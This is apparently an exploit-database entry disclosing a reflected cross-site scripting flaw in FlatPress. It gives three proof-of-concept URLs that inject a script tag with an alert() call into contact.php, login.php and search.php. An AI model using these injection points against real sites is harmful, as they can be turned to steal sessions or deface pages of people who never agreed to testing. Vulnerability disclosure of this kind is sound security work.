id: 10430
date: 12/26/2009
title: FlatPress Cross Site Scripting Vulnerability
author: indoushka
cves: 

============================================
FlatPress Cross Site Scripting Vulnerability
============================================

========================================================================================                 
| # Title    : FlatPress Cross Site Scripting Vulnerability                            |
| # Author   : indoushka                                                               |
| # Script   : powered by FlatPress / http://www.flatpress.org/                        |
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       |
| # Bug      : XSS                                                                     |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://server/flatpress/contact.php/>"><ScRiPt>alert(+213771818860)</ScRiPt>
| 2- http://server/flatpress/login.php/>"><ScRiPt>alert(+213771818860)</ScRiPt>
| 3- http://server/flatpress/search.php/>"><ScRiPt>alert(+213771818860)</ScRiPt>



#  0day.today [2023-03-22]  #